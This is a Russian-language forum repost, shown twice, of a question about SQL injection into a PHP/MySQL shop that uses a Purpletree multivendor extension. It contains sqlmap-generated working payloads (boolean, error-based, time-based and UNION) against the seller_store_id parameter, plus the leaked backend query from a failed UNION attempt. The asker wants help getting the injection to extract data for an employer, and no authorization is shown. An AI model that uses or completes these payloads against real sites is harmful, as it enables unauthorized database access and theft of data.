Внедрение SQL в веб -приложение MySQL PHP всегда возвращает ошибку [дублировать]

Внедрение SQL в веб -приложение MySQL PHP всегда возвращает ошибку [дублировать] ⇐ MySql

Ответить

1 сообщение • Страница 1 из 1

Anonymous

Внедрение SQL в веб -приложение MySQL PHP всегда возвращает ошибку [дублировать]

Цитата

Сообщение Anonymous » 13 фев 2025, 14:42

мне было поручено проверить веб -сайт и на одной из страниц, которые я нашел Sqlinection. < /p>

Код: Выделить всё

storeview&seller_store_id=198

Я проверил его с помощью SQLMAP, и вывод был:
Parameter: seller_store_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: route=extension/account/purpletree_multivendor/sellerstore/storeview&seller_store_id=198' OR NOT 9120=9120#

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: route=extension/account/purpletree_multivendor/sellerstore/storeview&seller_store_id=198' AND GTID_SUBSET(CONCAT(0x71786b7671,(SELECT (ELT(6687=6687,1))),0x7162707671),6687)-- QHLl

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
Payload: route=extension/account/purpletree_multivendor/sellerstore/storeview&seller_store_id=198' AND SLEEP(5)-- SCMK

Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: route=extension/account/purpletree_multivendor/sellerstore/storeview&seller_store_id=198' UNION ALL SELECT CONCAT(0x71786b7671,0x78514e4948654552474b464751735464614e4366616a4a684164425777517778674f737678775941,0x7162707671),NULL,NULL,NULL#
< /code>
Но когда я запускаю любой из них, я получаю ошибку -< /p>
Fatal error: Uncaught Exception: Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' AND p.status=1 AND pvp.is_approved=1 GROUP BY c.category_id' at line 1

Error No: 1064

SELECT pvp.product_id,cd.name,c.category_id,c.parent_id FROM shop2_purpletree_vendor_stores pvs
LEFT JOIN shop2_purpletree_vendor_products pvp ON(pvs.seller_id=pvp.seller_id)
LEFT JOIN shop2_product_to_category p2c ON (pvp.product_id=p2c.product_id)
LEFT JOIN shop2_category c ON(p2c.category_id=c.category_id)
LEFT JOIN shop2_category_description cd ON(c.category_id=cd.category_id)
LEFT JOIN shop2_product p ON(p.product_id=pvp.product_id) WHERE pvs.id='198'
UNION ALL SELECT NULL, NULL, NULL, NULL --'
AND cd.language_id = '1'
AND p.status=1
AND pvp.is_approved=1
GROUP BY c.category_id
in /home/www//storage/modification/system/library/db/mysqli.php:60 Stack trace: #0 /home/www//system/library/db.php(45): DB\MyS in /home/www//storage/modification/system/library/db/mysqli.php on line 60
< /code>
Как это исправить? Мой работодатель хочет хотя бы некоторых данных с этого сайта, а не только ошибки. Это мой первый день, я законен, могу потерять эту работу: (

Подробнее здесь: https://stackoverflow.com/questions/794 ... urns-error

1739446926

Anonymous

 мне было поручено проверить веб -сайт и на одной из страниц, которые я нашел Sqlinection. < /p>
[code]storeview&seller_store_id=198[/code] 
Я проверил его с помощью SQLMAP, и вывод был: 
Parameter: seller_store_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: route=extension/account/purpletree_multivendor/sellerstore/storeview&seller_store_id=198' OR NOT 9120=9120#

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: route=extension/account/purpletree_multivendor/sellerstore/storeview&seller_store_id=198' AND GTID_SUBSET(CONCAT(0x71786b7671,(SELECT (ELT(6687=6687,1))),0x7162707671),6687)-- QHLl

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
Payload: route=extension/account/purpletree_multivendor/sellerstore/storeview&seller_store_id=198' AND SLEEP(5)-- SCMK

Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: route=extension/account/purpletree_multivendor/sellerstore/storeview&seller_store_id=198' UNION ALL SELECT CONCAT(0x71786b7671,0x78514e4948654552474b464751735464614e4366616a4a684164425777517778674f737678775941,0x7162707671),NULL,NULL,NULL#
< /code>
Но когда я запускаю любой из них, я получаю ошибку -< /p>
 Fatal error: Uncaught Exception: Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' AND p.status=1 AND pvp.is_approved=1 GROUP BY c.category_id' at line 1

Error No: 1064

SELECT pvp.product_id,cd.name,c.category_id,c.parent_id FROM shop2_purpletree_vendor_stores pvs
LEFT JOIN shop2_purpletree_vendor_products pvp ON(pvs.seller_id=pvp.seller_id)
LEFT JOIN shop2_product_to_category p2c ON (pvp.product_id=p2c.product_id)
LEFT JOIN shop2_category c ON(p2c.category_id=c.category_id)
LEFT JOIN shop2_category_description cd ON(c.category_id=cd.category_id)
LEFT JOIN shop2_product p ON(p.product_id=pvp.product_id) WHERE pvs.id='198'
UNION ALL SELECT NULL, NULL, NULL, NULL --'
AND cd.language_id = '1'
AND p.status=1
AND pvp.is_approved=1
GROUP BY c.category_id
in /home/www//storage/modification/system/library/db/mysqli.php:60 Stack trace: #0 /home/www//system/library/db.php(45): DB\MyS in /home/www//storage/modification/system/library/db/mysqli.php on line 60
< /code>
Как это исправить? Мой работодатель хочет хотя бы некоторых данных с этого сайта, а не только ошибки. Это мой первый день, я законен, могу потерять эту работу: ( 

Подробнее здесь: [url]https://stackoverflow.com/questions/79436035/sqlinjection-into-mysqlphp-web-app-always-returns-error[/url]